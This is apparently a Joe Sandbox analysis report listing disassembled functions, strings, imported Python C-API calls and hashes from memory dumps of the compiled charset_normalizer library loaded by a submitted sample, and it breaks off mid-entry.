charset_normalizer.md.ArabicIsolatedFormPlugin, xrefs: 00007FFBAB6A8AE7

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: __init__$charset_normalizer.md.ArabicIsolatedFormPlugin$interpreted classes cannot inherit from compiled
API String ID: 1450464846-1141011871
Opcode ID: b59ea239b0ded2da1d7d86f123c67e001364e70b8c495ebd1fe9a254676c74a7
Instruction ID: 2015ce9a1c29e454fa22f0628b6de9f85e5bf70c70aef239e62c7b5401ad60f4
Opcode Fuzzy Hash: b59ea239b0ded2da1d7d86f123c67e001364e70b8c495ebd1fe9a254676c74a7
Instruction Fuzzy Hash: 21314DB1A4AA0281EB428F7DEC102A5A3B0FB48B88F589535DE6C47775EF3DE551C740

Function 00007FFBAB6A5A00 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A5A2A

Strings

charset_normalizer.md.UnprintablePlugin, xrefs: 00007FFBAB6A5AD7
interpreted classes cannot inherit from compiled, xrefs: 00007FFBAB6A5A20
__init__, xrefs: 00007FFBAB6A5A69, 00007FFBAB6A5AEA

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: __init__$charset_normalizer.md.UnprintablePlugin$interpreted classes cannot inherit from compiled
API String ID: 1450464846-116036081
Opcode ID: 571f9f9e96768ffb2ac53c4efc93ddbf52cbfab833ec0306282c52c0bf4d27d3
Instruction ID: bfed46302419de923e15943bed942e1b4910bb0decb2698f54669f04d6dab7a7
Opcode Fuzzy Hash: 571f9f9e96768ffb2ac53c4efc93ddbf52cbfab833ec0306282c52c0bf4d27d3
Instruction Fuzzy Hash: B83127B1A0AA4281EB42CB6DE8503A9B3B0FB48B88F549436CE6C47775EF3DE555C340

Function 00007FFBAB6A79F0 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A7A1A

Strings

charset_normalizer.md.CjkInvalidStopPlugin, xrefs: 00007FFBAB6A7AC7
interpreted classes cannot inherit from compiled, xrefs: 00007FFBAB6A7A10
__init__, xrefs: 00007FFBAB6A7A59, 00007FFBAB6A7ADA

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: __init__$charset_normalizer.md.CjkInvalidStopPlugin$interpreted classes cannot inherit from compiled
API String ID: 1450464846-2610960353
Opcode ID: 76a7a677629842859978aaa54d4c908ac2703a6c097ce1729baa8608753adc48
Instruction ID: fb49e1872bab07ff84529b9031d5e45e1a434e9f9f652dc4c4adec04faf58ccf
Opcode Fuzzy Hash: 76a7a677629842859978aaa54d4c908ac2703a6c097ce1729baa8608753adc48
Instruction Fuzzy Hash: 86314BB2A4AA0281EB42CB7DEC102A9A3B0FB48B88F549435CE6C47775EF3DE551C340

Function 00007FFBAB6A5450 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 65COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A547A

Strings

interpreted classes cannot inherit from compiled, xrefs: 00007FFBAB6A5470
__init__, xrefs: 00007FFBAB6A54B9, 00007FFBAB6A553A
charset_normalizer.md.TooManyAccentuatedPlugin, xrefs: 00007FFBAB6A5527

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_String
String ID: __init__$charset_normalizer.md.TooManyAccentuatedPlugin$interpreted classes cannot inherit from compiled
API String ID: 1450464846-2999409259
Opcode ID: 46a8908cafe4df30933cc1bf2f0944172b9d1b0b9ac90932bbe1890628880787
Instruction ID: 37d27e623766c9aa9482e709b2b08e7f004ace71ef7fbc4b885f6a3a935c698f
Opcode Fuzzy Hash: 46a8908cafe4df30933cc1bf2f0944172b9d1b0b9ac90932bbe1890628880787
Instruction Fuzzy Hash: FE3148B1A0AA0281EB42CF29E8102A9B3B1FB48B88F449435DE6C47775EF3DE451C340

Function 00007FFBAB6A9150 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 54COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON312 ref: 00007FFBAB6A9199

Strings

str, xrefs: 00007FFBAB6A91F3
charset_normalizer.md.MessDetectorPlugin, xrefs: 00007FFBAB6A91A6
eligible, xrefs: 00007FFBAB6A9206

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: SubtypeType_
String ID: charset_normalizer.md.MessDetectorPlugin$eligible$str
API String ID: 2891779845-1291782451
Opcode ID: 7f0862f8ed2a2bf7f8ea4440bfcb9bd23f6d9e60511077b2f04859b75fbf1be2
Instruction ID: fbcb1b082bc92d9450e03a3cdd9817c88f6e9a45c967195e7ee822110e3e893d
Opcode Fuzzy Hash: 7f0862f8ed2a2bf7f8ea4440bfcb9bd23f6d9e60511077b2f04859b75fbf1be2
Instruction Fuzzy Hash: 1F118EE1B4A64681EA469B6DDC612B5E370BF45BC0F98E039CD2D4B3B0DE2CE855C340

Function 00007FFBAB6A69A0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A69C6
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A69EE

Strings

str or None, xrefs: 00007FFBAB6A6A3C
'SuspiciousRange' object attribute '_last_printable_seen' cannot be deleted, xrefs: 00007FFBAB6A69BC

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_String
String ID: 'SuspiciousRange' object attribute '_last_printable_seen' cannot be deleted$str or None
API String ID: 1259552197-1971554219
Opcode ID: a918d477a285616c2c2e4df8314c3c17314b771cecf0fb593c970a7c657b72bd
Instruction ID: 106d5b9999c9411ae3939e21bbf0c163c96c929aea553234d7ab8d868d1c6cae
Opcode Fuzzy Hash: a918d477a285616c2c2e4df8314c3c17314b771cecf0fb593c970a7c657b72bd
Instruction Fuzzy Hash: AB1145B1B0654685EE568B6DE890278B3B0FF48B94F48E135DF2D477A5DE3CD4548700

Function 00007FFBAB6A8870 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A8896
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A88BE

Strings

'ArchaicUpperLowerPlugin' object attribute '_last_alpha_seen' cannot be deleted, xrefs: 00007FFBAB6A888C
str or None, xrefs: 00007FFBAB6A890C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_String
String ID: 'ArchaicUpperLowerPlugin' object attribute '_last_alpha_seen' cannot be deleted$str or None
API String ID: 1259552197-1607602726
Opcode ID: 2eb1423d3a8d026875b47d3e487d8fbdb754b2b35a34fb420c45883b89527626
Instruction ID: 9d04fc948c6cf15f4c9cb6fa43539e87533960e76d491fd644461a4bdc927ffd
Opcode Fuzzy Hash: 2eb1423d3a8d026875b47d3e487d8fbdb754b2b35a34fb420c45883b89527626
Instruction Fuzzy Hash: CE1175B2B1660686EF568B6DE850278F770FB48B94F48E135DE2D477A5DE3CE4508700

Function 00007FFBAB6A6450 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A6476
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A649E

Strings

str or None, xrefs: 00007FFBAB6A64EC
'SuspiciousDuplicateAccentPlugin' object attribute '_last_latin_character' cannot be deleted, xrefs: 00007FFBAB6A646C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_String
String ID: 'SuspiciousDuplicateAccentPlugin' object attribute '_last_latin_character' cannot be deleted$str or None
API String ID: 1259552197-4111674009
Opcode ID: 45422d08dff3ba37862566774811d1c873494940e91693ae83718888786eb3b7
Instruction ID: e7052e919009075263f35380ac765cdb906bd0928bb74a5bf326f76672ec1309
Opcode Fuzzy Hash: 45422d08dff3ba37862566774811d1c873494940e91693ae83718888786eb3b7
Instruction Fuzzy Hash: D31175B2B0660585EF568F6DE850278A374FF48B94F48E135DE2D477A5DE3CE4548700

Function 00007FFBAB6A52B0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 52COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A52D6
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A52FE

Strings

'TooManySymbolOrPunctuationPlugin' object attribute '_last_printable_char' cannot be deleted, xrefs: 00007FFBAB6A52CC
str or None, xrefs: 00007FFBAB6A534C

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_String
String ID: 'TooManySymbolOrPunctuationPlugin' object attribute '_last_printable_char' cannot be deleted$str or None
API String ID: 1259552197-2331204894
Opcode ID: 4a2e56e4c18d021721d1ff58624d4138fa5cae7aafe6a9259ab8a3639d0b6b2d
Instruction ID: fcacc6958f3372fd17100c555b039192f006100bdd42479e1faea8631f7760c1
Opcode Fuzzy Hash: 4a2e56e4c18d021721d1ff58624d4138fa5cae7aafe6a9259ab8a3639d0b6b2d
Instruction Fuzzy Hash: A01151B2B0660586EE46DB6DE950368B370FB84B94F48A135DE2D47764EE2CD4508700

Function 00007FFBAB6A9280 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 51COMMON

Download Yara Rule

APIs

PyType_IsSubtype.PYTHON312 ref: 00007FFBAB6A92C9

Strings

str, xrefs: 00007FFBAB6A9316
feed, xrefs: 00007FFBAB6A9329
charset_normalizer.md.MessDetectorPlugin, xrefs: 00007FFBAB6A92D6

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: SubtypeType_
String ID: charset_normalizer.md.MessDetectorPlugin$feed$str
API String ID: 2891779845-1310269896
Opcode ID: 174ffd5a8d4fbd5a7ace33c46627c3910e0e1c50ab3d8efb39f58c9a0e45e4fb
Instruction ID: 9eedaa2da2bc11ebd2a0217a69e9aa7b3fc09c74bac6fc8a08025c4fc5d9ad1d
Opcode Fuzzy Hash: 174ffd5a8d4fbd5a7ace33c46627c3910e0e1c50ab3d8efb39f58c9a0e45e4fb
Instruction Fuzzy Hash: A3113AE1A5A60681EE16AB7AEC512B5E3B0BF85B80F94A039DD2D473F4DE2CE441C300

Function 00007FFBAB6A77C0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 45COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312 ref: 00007FFBAB6A77E6
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A780E

Strings

str, xrefs: 00007FFBAB6A7827
'SuperWeirdWordPlugin' object attribute '_buffer' cannot be deleted, xrefs: 00007FFBAB6A77DC

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_String
String ID: 'SuperWeirdWordPlugin' object attribute '_buffer' cannot be deleted$str
API String ID: 1259552197-1393815803
Opcode ID: e3b12353829d0deeeabf54bb8e44c1ef7eec8a574ceacd3afffb07c93fd7f85b
Instruction ID: c38f01fec3cb705276224ef4c03e4f41359e388a81758ce82d433a5f9affcd1b
Opcode Fuzzy Hash: e3b12353829d0deeeabf54bb8e44c1ef7eec8a574ceacd3afffb07c93fd7f85b
Instruction Fuzzy Hash: 71118CB2A0A54286EF56CF7DE8902B8F3B0FB44B84F08E031DE2D46665DE2CD490C710

Function 00007FFBAB6AB7F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

PyObject_VectorcallMethod.PYTHON312 ref: 00007FFBAB6AB818
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6AB860

Part of subcall function 00007FFBAB6A3800: PyErr_Format.PYTHON312 ref: 00007FFBAB6A3834

Strings

bool, xrefs: 00007FFBAB6AB836
eligible, xrefs: 00007FFBAB6AB873

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_FormatMethodObject_Vectorcall
String ID: bool$eligible
API String ID: 2503426208-3320767611
Opcode ID: 6ffd60cce85a421e8434590f2d4fc69a980ada6fd10450d1b70e0e88f2682bec
Instruction ID: e642cb99e23cba58113737a51a6a2f709b50449ec6b60f6eea9ef1884bebb2ea
Opcode Fuzzy Hash: 6ffd60cce85a421e8434590f2d4fc69a980ada6fd10450d1b70e0e88f2682bec
Instruction Fuzzy Hash: 4A114CA1E5AA4280EF568B7DEC503B5E3B0EF48B84F88B039DD2D066B5DE2CD4808700

Function 00007FFBAB6A95B0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

PyObject_VectorcallMethod.PYTHON312 ref: 00007FFBAB6A95D8
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9620

Part of subcall function 00007FFBAB6A3800: PyErr_Format.PYTHON312 ref: 00007FFBAB6A3834

Strings

bool, xrefs: 00007FFBAB6A95F6
eligible, xrefs: 00007FFBAB6A9633

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_FormatMethodObject_Vectorcall
String ID: bool$eligible
API String ID: 2503426208-3320767611
Opcode ID: c5b4b4656a59a8e67beff081790a41d695e4145e237a7eb8b31be5e0c87158af
Instruction ID: c9cf267bf1600303c452f55760096bb9a291dd94d0d7507837040f1fe1e09690
Opcode Fuzzy Hash: c5b4b4656a59a8e67beff081790a41d695e4145e237a7eb8b31be5e0c87158af
Instruction Fuzzy Hash: D7113AB1E5AA4281FF568B79EC513A5A2B0EF44B84F58B039DE2D066B5DE2CE4808700

Function 00007FFBAB6A9F80 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44COMMON

Download Yara Rule

APIs

PyObject_VectorcallMethod.PYTHON312 ref: 00007FFBAB6A9FA8
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6A9FF0

Part of subcall function 00007FFBAB6A3800: PyErr_Format.PYTHON312 ref: 00007FFBAB6A3834

Strings

bool, xrefs: 00007FFBAB6A9FC6
eligible, xrefs: 00007FFBAB6AA003

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocErr_FormatMethodObject_Vectorcall
String ID: bool$eligible
API String ID: 2503426208-3320767611
Opcode ID: 45e89110cdaede4183728df16b150787876237ae891cae742361569b5cc7dc65
Instruction ID: 41da34e2a872400f22ab5c436914e7f7345e057ffe42cdac6d946cc3367d6908
Opcode Fuzzy Hash: 45e89110cdaede4183728df16b150787876237ae891cae742361569b5cc7dc65
Instruction Fuzzy Hash: 9B111FA1A5AA4281EF568BB9EC517B5A3B0EF44784F58B039DE6D066B5DE2CD480C700

Function 00007FFBAA461EF0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 42COMMON

Download Yara Rule

APIs

PyErr_SetString.PYTHON312(?,?,?,?,?,00007FFBAA461EDC), ref: 00007FFBAA463B35

Part of subcall function 00007FFBAA461FD0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA462008
Part of subcall function 00007FFBAA461FD0: strncmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 00007FFBAA462026

PyErr_Format.PYTHON312 ref: 00007FFBAA461F53

Strings

undefined character name '%s', xrefs: 00007FFBAA461F46
name too long, xrefs: 00007FFBAA463B2B

Memory Dump Source

Source File: 00000002.00000002.1831536690.00007FFBAA461000.00000020.00000001.01000000.0000001B.sdmp, Offset: 00007FFBAA460000, based on PE: true

Associated: 00000002.00000002.1831396691.00007FFBAA460000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA465000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA4C2000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA50E000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA512000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA517000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1831575053.00007FFBAA56F000.00000002.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832420063.00007FFBAA572000.00000004.00000001.01000000.0000001B.sdmpDownload File
Associated: 00000002.00000002.1832455166.00007FFBAA574000.00000002.00000001.01000000.0000001B.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbaa460000_HyZh4pn0RF.jbxd

Similarity

API ID: Err_strncmp$FormatString
String ID: name too long$undefined character name '%s'
API String ID: 3882229318-4056717002
Opcode ID: 715c9f25760f3b51f9c773b91e4e06c178d711229799cf52a99adf42e7180ef0
Instruction ID: 560e9659db5a48ab2788b26b86706bc95d61156866d056bfa2e69d6a7c341821
Opcode Fuzzy Hash: 715c9f25760f3b51f9c773b91e4e06c178d711229799cf52a99adf42e7180ef0
Instruction Fuzzy Hash: 6B111FB5E1AA47C1EB018B28E4842B46368FB88F48F840475EE0D472A0DF7DD14BC761

Function 00007FFBAB6B31DC Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B31FB
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B3219
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B3233

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocDict_ItemPackTuple_
String ID: <module>
API String ID: 4228545439-217463007
Opcode ID: 70a5f35237a7bac29e318148100934e2ec0d39acdf239b2d5f662bd422f8af1b
Instruction ID: 2d15595e7f782591399a05a1cce1cb376c0290050df17eb6fe8b87af319ae415
Opcode Fuzzy Hash: 70a5f35237a7bac29e318148100934e2ec0d39acdf239b2d5f662bd422f8af1b
Instruction Fuzzy Hash: C901D3B2A8BA1291FA075BACDC542B4B271BB10B90F44E434CE2E063B1DF3EA5858341

Function 00007FFBAB6B29AF Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 36COMMON

Download Yara Rule

APIs

PyDict_SetItem.PYTHON312 ref: 00007FFBAB6B29CE
_Py_Dealloc.PYTHON312 ref: 00007FFBAB6B29EC
PyTuple_Pack.PYTHON312(?,?,?,?,?,?,00000000,?,?,00000000,00007FFBAB6A8F1A), ref: 00007FFBAB6B2A06

Strings

<module>, xrefs: 00007FFBAB6B3822

Memory Dump Source

Source File: 00000002.00000002.1837448997.00007FFBAB6A1000.00000020.00000001.01000000.0000001A.sdmp, Offset: 00007FFBAB6A0000, based on PE: true

Associated: 00000002.00000002.1837412873.00007FFBAB6A0000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837496958.00007FFBAB6B5000.00000002.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837718581.00007FFBAB6BB000.00000004.00000001.01000000.0000001A.sdmpDownload File
Associated: 00000002.00000002.1837789457.00007FFBAB6BF000.00000002.00000001.01000000.0000001A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ffbab6a0000_HyZh4pn0RF.jbxd

Similarity

API ID: DeallocDict_ItemPackTuple_
String ID: <module>
API String ID: 4228545439-217463007
Opcode ID: 61c017c81d5e6fa3815ca9fce73e5b847532078dee348fb6f530cef8c5aad8c5
Instruction ID: d8e834f6cb07b5673c8a5738a4cf9d540169971c1a5b6fc4ca016ed81ed528be
